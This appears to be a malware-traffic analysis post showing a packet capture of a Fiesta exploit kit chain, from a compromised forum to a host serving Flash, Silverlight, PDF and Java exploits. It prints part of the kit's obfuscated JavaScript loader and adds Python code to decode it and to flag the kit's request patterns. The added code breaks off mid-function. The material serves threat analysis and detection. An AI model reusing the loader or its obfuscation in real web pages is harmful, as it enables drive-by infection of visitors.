Fiesta-EK Exploit Kit Trying Shockwave Flash Silverlight Java PCAP Traffic Sample

June 22, 2015

2015-02-05 12:33:52.634092 IP 192.168.221.134.49257 > 38.113.120.12.80: Flags [P.], seq 1:669, ack 1, win 64240, length 668
GET / HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.google.co.uk/url?url=http://www.droidrzr[.]com/&rct=j&frm=1&q=&esrc=s&sa=U&ei=Z5vTVK2NIOes7Abi0oHYBg&ved=0CBUQFjAA&usg=AFQjCNE797nP9xKz4E4-jpH9Rk-HR_8-Bg
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.droidrzr[.]com
Connection: Keep-Alive
2015-02-05 12:33:52.634227 IP 38.113.120.12.80 > 192.168.221.134.49257: Flags [.], ack 669, win 64240, length 0
2015-02-05 12:34:01.745868 IP 38.113.120.12.80 > 192.168.221.134.49257: Flags [P.], seq 1:1356, ack 669, win 64240, length 1355
HTTP/1.1 200 OK
Date: Thu, 05 Feb 2015 16:27:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.3.22
Set-Cookie: session_id=52761f4298b0b1d291eff75706cf9c66; path=/; httponly
Cache-Control: no-cache, must-revalidate, max-age=0
Expires: Wed, 04 Feb 2015 16:27:48 GMT
Pragma: no-cache
Content-Encoding: gzip
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html;charset=UTF-8

5bf2
[gzip-compressed HTML body (chunk of 0x5bf2 bytes); binary not shown]
2015-02-05 12:34:01.849180 IP 38.113.120.12.80 > 192.168.221.134.49257: Flags [P.], seq 1:1356, ack 669, win 64240, length 1355
[TCP retransmission of the segment above (same seq 1:1356): identical HTTP/1.1 200 OK headers and 5bf2 chunk header, not repeated]
2015-02-05 12:34:02.896896 IP 192.168.221.134.49262 > 136.243.224.9.80: Flags [P.], seq 1:465, ack 1, win 64240, length 464
GET /rIu-hMGZHkJUT/YMxgGj-wNK_WpIOHJhik/kOpTWt/XTZ--r-GoU--H_wKtgzNO-.php?_-F8vzUE=-203Y5dv5&WZRk=0qbp0k1Yqee&fd=f-L01w89n4&8=aq3 HTTP/1.1
Accept: */*
Referer: http://www.droidrzr[.]com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: iopsctlvzs[.]com
Connection: Keep-Alive
2015-02-05 12:34:03.707250 IP 136.243.224.9.80 > 192.168.221.134.49262: Flags [P.], seq 1:1410, ack 465, win 64240, length 1409
HTTP/1.1 200 OK
Date: Thu, 05 Feb 2015 16:34:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.3.29
Pragma: no-cache, no-store
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 1125
Connection: close
Content-Type: text/javascript
X-Pad: avoid browser bug
2015-02-05 12:34:04.559056 IP 192.168.221.134.49257 > 38.113.120.12.80: Flags [P.], seq 669:1114, ack 24019, win 64240, length 445
GET /public/style_images/dark_matter/useropts_arrow.png HTTP/1.1
Accept: */*
Referer: http://www.droidrzr[.]com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.droidrzr[.]com
Connection: Keep-Alive
Cookie: session_id=52761f4298b0b1d291eff75706cf9c66
2015-02-05 12:34:04.559227 IP 38.113.120.12.80 > 192.168.221.134.49257: Flags [.], ack 1114, win 64240, length 0
2015-02-05 12:34:04.888803 IP 38.113.120.12.80 > 192.168.221.134.49257: Flags [P.], seq 24019:24512, ack 1114, win 64240, length 493
HTTP/1.1 200 OK
Date: Thu, 05 Feb 2015 16:27:59 GMT
Server: Apache/2
Last-Modified: Tue, 25 Dec 2012 20:11:00 GMT
ETag: "43810f-d9-4d1b2e993bd00"
Accept-Ranges: bytes
Content-Length: 217
Keep-Alive: timeout=2, max=99
Connection: Keep-Alive
Content-Type: image/png

[PNG image body (217 bytes); binary not shown]
2015-02-05 12:34:04.891235 IP 192.168.221.134.49257 > 38.113.120.12.80: Flags [P.], seq 1114:1561, ack 24512, win 63747, length 447
GET /uploads/profile/photo-thumb-50903.jpeg?_r=1420221854 HTTP/1.1
Accept: */*
Referer: http://www.droidrzr[.]com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.droidrzr[.]com
Connection: Keep-Alive
Cookie: session_id=52761f4298b0b1d291eff75706cf9c66
2015-02-05 12:34:04.891244 IP 38.113.120.12.80 > 192.168.221.134.49257: Flags [.], ack 1561, win 64240, length 0
2015-02-05 12:34:05.293515 IP 38.113.120.12.80 > 192.168.221.134.49257: Flags [P.], seq 24512:25867, ack 1561, win 64240, length 1355
HTTP/1.1 200 OK
Date: Thu, 05 Feb 2015 16:27:59 GMT
Server: Apache/2
Last-Modified: Fri, 02 Jan 2015 18:04:14 GMT
ETag: "2788bac-8c0-50baf2b1c2380"
Accept-Ranges: bytes
Content-Length: 2240
Keep-Alive: timeout=2, max=98
Connection: Keep-Alive
Content-Type: image/jpeg

[JPEG image body; JFIF with comment "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 75"; binary not shown]
2015-02-05 12:34:05.294177 IP 38.113.120.12.80 > 192.168.221.134.49257: Flags [P.], seq 25867:27032, ack 1561, win 64240, length 1165
[JPEG image body, continued; binary not shown]
2015-02-05 12:34:05.295163 IP 192.168.221.134.49257 > 38.113.120.12.80: Flags [.], ack 27032, win 64240, length 0
2015-02-05 12:34:05.297778 IP 192.168.221.134.49257 > 38.113.120.12.80: Flags [P.], seq 1561:1997, ack 27032, win 64240, length 436
GET /public/style_extra/sharelinks/twitter.png HTTP/1.1
Accept: */*
Referer: http://www.droidrzr[.]com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.droidrzr[.]com
Connection: Keep-Alive
Cookie: session_id=52761f4298b0b1d291eff75706cf9c66
2015-02-05 12:34:05.689313 IP 38.113.120.12.80 > 192.168.221.134.49257: Flags [P.], seq 27032:27884, ack 1997, win 64240, length 852
HTTP/1.1 200 OK
Date: Thu, 05 Feb 2015 16:27:59 GMT
Server: Apache/2
Last-Modified: Sun, 14 Apr 2013 21:06:19 GMT
ETag: "3a8224-23f-4da5881f2e8c0"
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=2, max=97
Connection: Keep-Alive
Content-Type: image/png

[PNG image body (575 bytes, IHDR through IEND); binary not shown]
2015-02-05 12:34:05.709440 IP 192.168.221.134.49257 > 38.113.120.12.80: Flags [P.], seq 1997:2443, ack 27884, win 63388, length 446
GET /uploads/profile/photo-thumb-41248.png?_r=1393899418 HTTP/1.1
Accept: */*
Referer: http://www.droidrzr[.]com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.droidrzr[.]com
Connection: Keep-Alive
Cookie: session_id=52761f4298b0b1d291eff75706cf9c66
2015-02-05 12:34:05.709538 IP 38.113.120.12.80 > 192.168.221.134.49257: Flags [.], ack 2443, win 64240, length 0
2015-02-05 12:34:06.022982 IP 38.113.120.12.80 > 192.168.221.134.49257: Flags [P.], seq 27884:29239, ack 2443, win 64240, length 1355
HTTP/1.1 200 OK
Date: Thu, 05 Feb 2015 16:28:00 GMT
Server: Apache/2
Last-Modified: Tue, 04 Mar 2014 02:16:58 GMT
ETag: "2788ab9-472e-4f3be7fa99a80"
Accept-Ranges: bytes
Content-Length: 18222
Keep-Alive: timeout=2, max=96
Connection: Keep-Alive
Content-Type: image/png

[PNG image body; binary not shown]
2015-02-05 12:34:06.738948 IP 192.168.221.134.49257 > 38.113.120.12.80: Flags [P.], seq 2443:2918, ack 46387, win 63352, length 475
GET /public/style_extra/sharelinks/print.png HTTP/1.1
Accept: */*
Referer: http://www.droidrzr[.]com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: www.droidrzr[.]com
Connection: Keep-Alive
Cookie: session_id=52761f4298b0b1d291eff75706cf9c66; _ga=GA1.2.1344201475.1423154045; _gat=1
2015-02-05 12:34:06.739041 IP 38.113.120.12.80 > 192.168.221.134.49257: Flags [.], ack 2918, win 64240, length 0
2015-02-05 12:34:07.090634 IP 38.113.120.12.80 > 192.168.221.134.49257: Flags [P.], seq 46387:47073, ack 2918, win 64240, length 686
HTTP/1.1 200 OK
Date: Thu, 05 Feb 2015 16:28:01 GMT
Server: Apache/2
Last-Modified: Sun, 14 Apr 2013 21:06:18 GMT
ETag: "3a8220-199-4da5881e3a680"
Accept-Ranges: bytes
Content-Length: 409
Keep-Alive: timeout=2, max=95
Connection: Keep-Alive
Content-Type: image/png

[PNG image body; binary not shown]
2015-02-05 12:34:15.061322 IP 192.168.221.134.49329 > 205.234.186.113.80: Flags [P.], seq 1:558, ack 1, win 64240, length 557
GET /v3_g1okw/kSoNIfMf-YApwN_B7NtP HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.droidrzr[.]com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: onlovemusic[.]in
Connection: Keep-Alive
2015-02-05 12:34:15.061505 IP 205.234.186.113.80 > 192.168.221.134.49329: Flags [.], ack 558, win 64240, length 0
2015-02-05 12:34:15.601368 IP 205.234.186.113.80 > 192.168.221.134.49329: Flags [P.], seq 1:1356, ack 558, win 64240, length 1355
HTTP/1.1 200 OK
Server: nginx/1.4.4
Date: Thu, 05 Feb 2015 16:36:45 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 05 Feb 2015 16:36:45 GMT
Pragma: no-cache
Crags and i marvel; for thither had worn, and secreted, but lure. Nimbler boat must cord dismissd, that usury offends celestial dame . Dim i descended thus ruin . Power, no more proud one the wind is my going. By; and marvel; for my secreted, but nimbler. Cord that holds them horrible dispraise! i my whelps, that . Dim i spake: o ruin ye have. Power, no proud alp, and by; and bruges, to mind. Marvel; for secreted, but silence. Nimbler boat must we from. Dim i questiond: shall live the ruin ye aware, down power . Proud scorn, but thorns confine on me! cried by; and vast . Marvel; for secreted, but nimbler boat must. Cord dismissd, that markd and on his have thee charon complain . Dim i arrive, a ruin ye citizens. Power, and proud honour to by; and marvel; for every. Secreted, but those sages tell . Cord that dim i spied . Power, no ill proud tyrants bosoms. By; and hisses with him, as marvel . Nimbler boat must lead, whom there. Dim i keep my purse i ruin ye beneath, where power. Proud scorn, and entring joind pen
2015-02-05 12:34:15.604277 IP 205.234.186.113.80 > 192.168.221.134.49329: Flags [P.], seq 1356:2711, ack 558, win 64240, length 1355

2015-02-05 12:34:17.115843 IP 192.168.221.134.49330 > 205.234.186.113.80: Flags [P.], seq 1:481, ack 1, win 64240, length 480
GET /v3_g1okw/338d1c711e98f992070a0f5f03580605060a0b5f0501070a06075c5708000655;118800;94 HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://onlovemusic[.]in/v3_g1okw/kSoNIfMf-YApwN_B7NtP
x-flash-version: 11,8,800,94
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: onlovemusic[.]in
Connection: Keep-Alive
2015-02-05 12:34:17.115861 IP 205.234.186.113.80 > 192.168.221.134.49330: Flags [.], ack 481, win 64240, length 0
2015-02-05 12:34:17.245921 IP 205.234.186.113.80 > 192.168.221.134.49331: Flags [S.], seq 2332289060, ack 3526089646, win 64240, options [mss 1460], length 0
2015-02-05 12:34:17.246811 IP 192.168.221.134.49331 > 205.234.186.113.80: Flags [.], ack 1, win 64240, length 0
2015-02-05 12:34:17.248864 IP 192.168.221.134.49331 > 205.234.186.113.80: Flags [P.], seq 1:629, ack 1, win 64240, length 628
GET /v3_g1okw/21c08ad39ade24d35b540f0b0a5a55070708500b0c0354080705070301025557 HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://onlovemusic[.]in/v3_g1okw/kSoNIfMf-YApwN_B7NtP
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: onlovemusic[.]in
Connection: Keep-Alive
2015-02-05 12:34:17.248943 IP 205.234.186.113.80 > 192.168.221.134.49331: Flags [.], ack 629, win 64240, length 0
2015-02-05 12:34:17.413809 IP 205.234.186.113.80 > 192.168.221.134.49330: Flags [.], seq 1:1461, ack 481, win 64240, length 1460
HTTP/1.1 200 OK
Server: nginx/1.4.4
Date: Thu, 05 Feb 2015 16:36:47 GMT
Content-Type: application/x-shockwave-flash
Content-Length: 10212
Connection: close
Last-Modified: Thu, 05 Feb 2015 16:36:47 GMT
Content-Disposition: inline; filename=jsoxmnrd274.swf
2015-02-05 12:34:17.751218 IP 192.168.221.134.49332 > 205.234.186.113.80: Flags [P.], seq 1:363, ack 1, win 64240, length 362
GET /v3_g1okw/20a3d74e4bada76c415c1708560c0551070952085055045e070405005d540501;4060531 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: onlovemusic[.]in
Connection: Keep-Alive

2015-02-05 12:34:18.088799 IP 192.168.221.134.49333 > 205.234.186.113.80: Flags [P.], seq 1:384, ack 1, win 64240, length 383
GET /v3_g1okw/6da72b68b9aa419e5a0d030c0059070c035d520c06000603035005040b01075c;910 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: onlovemusic[.]in
Connection: Keep-Alive
Cache-Control: no-cache
2015-02-05 12:34:18.088901 IP 205.234.186.113.80 > 192.168.221.134.49333: Flags [.], ack 384, win 64240, length 0
2015-02-05 12:34:18.124381 IP 205.234.186.113.80 > 192.168.221.134.49331: Flags [.], seq 12196:13656, ack 629, win 64240, length 1460
[earlier segments of this response are not shown; the capture resumes mid-way through the encoded payload div]
Y39eCi5fAYgF_P9eyj9e3PReADgmof7X1f8qrI5ZaJLXbs5lJJ2lnJTluJ7jB02fx0gWAg5UhSrFSzxK1DgwnP9fyD9eADAKdDgKkPxOowrFDqyj3sxqDBxUuJemYzgFUv5qYagK_SrfyarUuJee1jreA15EYSrwkP9fA0gq6ogfxDrlbi2ZDsxFUZxX1G8qD3gqJi7Xuf9KdB7O3sxEDDrOo08fyDxWkjgwhs</div></body>
<script>
function gena6v(jt,vi,qwi){var yj,sbn,i5,dh,p5u;dh='';i5=0;yj=0;p5u='char';while(yj<jt.length){i5=i5+vi;sbn=qwi.indexOf(gaudbv(jt,yj,p5u));sbn=(sbn+i5)%qwi.length;dh+=gaudbv(qwi,sbn,p5u);yj++}return dh}
function hogsa(lan){var n3o,s4,uo2,ah8;uo2='';ah8=0;while(ah8<lan.length){s4=lan.substr(ah8,2);n3o=bombtt(s4);uo2=uo2+String.fromCharCode(n3o);ah8+=2}return uo2}
blobk='DL6aBZ-Aeu3W4CigX=17ml5dzJFnP+pEfKR80qQ2N9jvckUb';
function rigs1m(f5k,nx){return hogsa(gena6v(f5k,nx,blobk))}
function bombtt(tzg){var ci,lk;lk=16;ci=parseInt(tzg,lk);return ci}
function gaudbv(k8f,o1,cto){return k8f[cto+'At'](o1)}
cree9='bMOlNUFWVy7-TC8LnAmX_kKe9rRg5x2QoaZz3DEwi0cHBuPIJdjvh1qf6YGs4Stp';
function wats72(rbp,fu){(window[rbp])(fu)}
function stano(msy,u4t){var jsi,os,yw4;yw4=rigs1m('kXfNe5uPCWD=B0ea',22);os='length';jsi=msy[yw4](16);while(jsi[os]<u4t){jsi='0'+jsi}return jsi}
function defyyc(sod){var pg,n7e,jc,tt;jc='length';n7e='';pg=0;while(pg<sod[jc]){tt=moanbb(sod,pg);n7e+=stano(tt,6);pg+=4}return hogsa(n7e)}
function foote(xcy,l3){xcy[l3]=jetsz(deus8(),'hilly')}
function jetsz(gg,wv){var u9,mlr,ni1;u9=rigs1m('F9FeFeF5v208U40d0c',24);mlr=gg['getElementById'](wv);ni1=mlr[u9];return defyyc(ni1)}
function deus8(){retur
2015-02-05 12:34:18.124400 IP 205.234.186.113.80 > 192.168.221.134.49331: Flags [FP.], seq 13656:14154, ack 629, win 64240, length 498
n window['docume'+'nt']}
function bunk3(){return 'body'}
function tofumz(){var ky,y5z,aom,x5o,s9t;x5o=deus8();y5z=x5o['createElement']('script');s9t=bunk3();try{x5o[s9t]++}catch(exc){ky='append';ky+='Child';aom=jetsz(x5o,'floetg');foote(y5z,'text');x5o[s9t][ky](y5z);wats72('owed0',aom)}}
function moanbb(u4p,kl5){var vbh,pqn,x9,l25;x9=0;l25=0;while(l25<4){pqn=gaudbv(u4p,kl5+l25,'char');vbh=cree9['index'+'Of'](pqn);vbh=vbh&0x3f;x9|=vbh<<(3-l25)*6;l25++}return x9}
tofumz();
</script>
</html>
0
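The landing-page script above hides two things: its own string constants (the `rigs1m(...)` calls, a position-dependent shift over the 48-symbol `blobk` alphabet followed by hex decoding) and two `<div>` bodies (`floetg` and `hilly`) that `defyyc()` decodes with a base64 variant using the shuffled 64-symbol `cree9` table. The decoded `hilly` text is appended as a `<script>` (defining `owed0`), and the decoded `floetg` text is passed to it. Note that all of this runs from the `catch` of `try{document.body++}`, so a JavaScript emulator that does not make that assignment throw will never reach the payload. The following Python is an added example, not code from the original post: it ports those routines so the hidden divs can be decoded offline from a full capture. The alphabets and control flow are transcribed from the script; the JS function names are kept so the port reads side by side with the capture. Because this excerpt only shows the tail of the `floetg` div, the payload decoded at the bottom is constructed here with an encoder that is not part of the landing page.

```python
"""Offline port of the decoding routines in the captured Fiesta landing page.

Added example, not code from the original post. The two alphabets and the
control flow are transcribed from the <script> in the onlovemusic[.]in
response; the JS names (gena6v, hogsa, rigs1m, moanbb, stano, defyyc) are
kept.  The payload encoded at the bottom is constructed for this example.
"""

# Alphabet used by gena6v()/rigs1m() to hide string constants (48 symbols).
BLOBK = "DL6aBZ-Aeu3W4CigX=17ml5dzJFnP+pEfKR80qQ2N9jvckUb"
# Alphabet used by moanbb()/defyyc(): base64 with a shuffled 64-symbol table.
CREE9 = "bMOlNUFWVy7-TC8LnAmX_kKe9rRg5x2QoaZz3DEwi0cHBuPIJdjvh1qf6YGs4Stp"


def hogsa(hexstr: str) -> str:
    """hogsa(): two hex digits at a time, String.fromCharCode() each byte."""
    return "".join(chr(int(hexstr[i:i + 2], 16)) for i in range(0, len(hexstr), 2))


def gena6v(jt: str, vi: int, qwi: str = BLOBK) -> str:
    """gena6v(): position-dependent shift over alphabet qwi.

    The shift for the k-th input symbol (1-based) is k*vi; the symbol's index
    in the alphabet is advanced by that amount modulo the alphabet size.
    """
    out, shift = [], 0
    for ch in jt:
        shift += vi
        out.append(qwi[(qwi.index(ch) + shift) % len(qwi)])
    return "".join(out)


def rigs1m(f5k: str, nx: int) -> str:
    """rigs1m(): shift with BLOBK, then hex-decode; yields a property name."""
    return hogsa(gena6v(f5k, nx, BLOBK))


def moanbb(s: str, pos: int) -> int:
    """moanbb(): four CREE9 symbols -> one 24-bit integer.

    JS charAt() past the end returns '' and indexOf('') is 0, so a short last
    group is zero-padded; an unknown symbol gives -1 & 0x3f == 63, as in the JS.
    """
    x = 0
    for k in range(4):
        v = CREE9.find(s[pos + k]) if pos + k < len(s) else 0
        x |= (v & 0x3F) << ((3 - k) * 6)
    return x


def defyyc(sod: str) -> str:
    """defyyc(): custom base64 -> hex (stano() pads each group to 6 digits) -> text."""
    hexbuf = "".join(format(moanbb(sod, pos), "06x") for pos in range(0, len(sod), 4))
    return hogsa(hexbuf)


def decoded_constants() -> tuple:
    """The two constants the captured script resolves at runtime."""
    return rigs1m("kXfNe5uPCWD=B0ea", 22), rigs1m("F9FeFeF5v208U40d0c", 24)


def encode_cree9(data: bytes) -> str:
    """Inverse of defyyc() (not part of the landing page): NUL-pad to 3-byte
    groups and emit four CREE9 symbols per group.  Used only to build input."""
    data += b"\x00" * (-len(data) % 3)
    groups = (int.from_bytes(data[i:i + 3], "big") for i in range(0, len(data), 3))
    return "".join(CREE9[(n >> ((3 - k) * 6)) & 0x3F] for n in groups for k in range(4))


# Constructed stand-in for the hidden <div id="floetg"> contents.
SAMPLE_SCRIPT = "function owed0(u){/* constructed sample, not the real stage-2 */}"
SAMPLE_DIV = encode_cree9(SAMPLE_SCRIPT.encode("latin-1"))


def decode_hidden_div(text: str) -> str:
    """What jetsz(document,'floetg') / jetsz(document,'hilly') return, with the
    NUL padding introduced by the 3-byte grouping stripped."""
    return defyyc(text).rstrip("\x00")


if __name__ == "__main__":
    print(decoded_constants())          # ('toString', 'innerHTML')
    print(decode_hidden_div(SAMPLE_DIV))
```

`decoded_constants()` shows what the two `rigs1m()` calls resolve to: `toString` (so `stano()` is just `Number.toString(16)` left-padded to six digits) and `innerHTML` (so `jetsz()` reads a div's innerHTML). To decode the real `floetg` and `hilly` divs, paste their full innerHTML from a complete capture into `decode_hidden_div()`; the fragment visible on this page starts mid-stream, so its 4-symbol alignment is unknown and it cannot be decoded on its own.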
2015-02-05 12:34:18.125312 IP 205.234.186.113.80 > 192.168.221.134.49332: Flags [.], seq 1:1461, ack 363, win 64240, length 1460
HTTP/1.1 200 OK
Server: nginx/1.4.4
Date: Thu, 05 Feb 2015 16:36:48 GMT
Content-Type: application/x-silverlight-app
Content-Length: 10499
Connection: close
Last-Modified: Thu, 05 Feb 2015 16:36:48 GMT
Content-Disposition: inline; filename=pevgbifk406.xap
2015-02-05 12:34:18.401079 IP 205.234.186.113.80 > 192.168.221.134.49333: Flags [.], seq 1:1461, ack 384, win 64240, length 1460
HTTP/1.1 200 OK
Server: nginx/1.4.4
Date: Thu, 05 Feb 2015 16:36:48 GMT
Content-Type: application/pdf
Content-Length: 8301
Connection: close
Content-Disposition: inline; filename=pjbzaek385.pdf

%PDF-1.6
2015-02-05 12:34:19.030299 IP 205.234.186.113.80 > 192.168.221.134.49334: Flags [.], seq 1:1461, ack 357, win 64240, length 1460
HTTP/1.1 200 OK
Server: nginx/1.4.4
Date: Thu, 05 Feb 2015 16:36:49 GMT
Content-Type: application/octet-stream
Content-Length: 139562
Connection: close

2015-02-05 12:34:49.502073 IP 192.168.221.134.49346 > 205.234.186.113.80: Flags [P.], seq 1:261, ack 1, win 64240, length 260
GET /v3_g1okw/73aa93f6a567188f544b045a0b085702020a525a0d51560d0207055200505752;1;3;1 HTTP/1.1
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_06
Host: onlovemusic[.]in
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
2015-02-05 12:34:49.502147 IP 205.234.186.113.80 > 192.168.221.134.49346: Flags [.], ack 261, win 64240, length 0
2015-02-05 12:34:49.878345 IP 205.234.186.113.80 > 192.168.221.134.49346: Flags [FP.], seq 1:155, ack 261, win 64240, length 154
HTTP/1.1 200 OK
Server: nginx/1.4.4
Date: Thu, 05 Feb 2015 16:37:20 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close

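The capture has a recognisable shape: the compromised forum (droidrzr[.]com) hands the browser to onlovemusic[.]in, where every exploit and payload URL is a 64-hex-character token under one short directory, optionally followed by `;digits` fields; the Flash fetch carries an `x-flash-version` header, and the last fetch comes from the Java runtime rather than the browser. As an added example (not from the original post), the following Python transcribes the request lines and the headers that matter from this capture and applies triage rules read off them. These are heuristics derived from this one session, not a published Fiesta signature. The Flash cross-check rests on the assumption that the `;118800;94` suffix is the `11,8,800,94` header with separators removed, which holds here but is not confirmed by the page; the filename rule is likewise read off the three `Content-Disposition` names. The Google referer on the first request is dropped from the transcription.

```python
"""Heuristic triage of the HTTP requests in this Fiesta EK capture.

Added example, not code from the original post.  The request lines and
headers below are transcribed from the capture (domains with [.] restored
for parsing); the rules are assumptions derived from this one session.
"""
import re
from typing import Dict, List

IE8_UA = ("Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; "
          ".NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)")
JAVA_UA_SEEN = "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_06"
LANDING = "http://onlovemusic.in/v3_g1okw/kSoNIfMf-YApwN_B7NtP"


def req(path: str, host: str, **headers: str) -> str:
    """Build a raw HTTP/1.1 GET the way the capture shows it (CRLF-terminated)."""
    lines = [f"GET {path} HTTP/1.1", f"Host: {host}"]
    lines += [f"{k.replace('_', '-')}: {v}" for k, v in headers.items()]
    return "\r\n".join(lines) + "\r\n\r\n"


# Transcribed from the capture, in order (constructed input for this example).
REQUESTS = [
    req("/", "www.droidrzr.com", user_agent=IE8_UA),
    req("/public/style_images/dark_matter/useropts_arrow.png", "www.droidrzr.com",
        user_agent=IE8_UA, referer="http://www.droidrzr.com/"),
    req("/v3_g1okw/kSoNIfMf-YApwN_B7NtP", "onlovemusic.in",
        user_agent=IE8_UA, referer="http://www.droidrzr.com/"),
    req("/v3_g1okw/338d1c711e98f992070a0f5f03580605060a0b5f0501070a06075c5708000655;118800;94",
        "onlovemusic.in", user_agent=IE8_UA, x_flash_version="11,8,800,94", referer=LANDING),
    req("/v3_g1okw/21c08ad39ade24d35b540f0b0a5a55070708500b0c0354080705070301025557",
        "onlovemusic.in", user_agent=IE8_UA, referer=LANDING),
    req("/v3_g1okw/20a3d74e4bada76c415c1708560c0551070952085055045e070405005d540501;4060531",
        "onlovemusic.in", user_agent=IE8_UA),
    req("/v3_g1okw/6da72b68b9aa419e5a0d030c0059070c035d520c06000603035005040b01075c;910",
        "onlovemusic.in", user_agent=IE8_UA, cache_control="no-cache"),
    req("/v3_g1okw/73aa93f6a567188f544b045a0b085702020a525a0d51560d0207055200505752;1;3;1",
        "onlovemusic.in", user_agent=JAVA_UA_SEEN),
]

# Short directory, then exactly 64 hex chars, then zero or more ';digits' fields.
HEX64_PATH = re.compile(r"^/[A-Za-z0-9_-]{4,16}/[0-9a-f]{64}((?:;\d+)*)$")
JAVA_UA = re.compile(r"\bJava/1\.\d")
# Read off jsoxmnrd274.swf / pevgbifk406.xap / pjbzaek385.pdf in the responses.
RANDOM_NAME = re.compile(r"^[a-z]{6,10}\d{3}\.(?:swf|xap|pdf)$")


def parse_request(raw: str):
    """Split a raw HTTP/1.x request into (method, path, {lowercased-name: value})."""
    head = raw.partition("\r\n\r\n")[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def flash_version_from_suffix(suffix: str) -> str:
    """';118800;94' -> '11880094', comparable to x-flash-version with commas removed."""
    return suffix.replace(";", "")


def suspicious_filename(name: str) -> bool:
    """Content-Disposition filename of the form <letters><3 digits>.<swf|xap|pdf>."""
    return RANDOM_NAME.match(name) is not None


def classify(raw: str) -> Dict[str, object]:
    """Score one request; 'reasons' lists every rule that fired, in rule order."""
    _method, path, headers = parse_request(raw)
    reasons: List[str] = []
    m = HEX64_PATH.match(path)
    if m:
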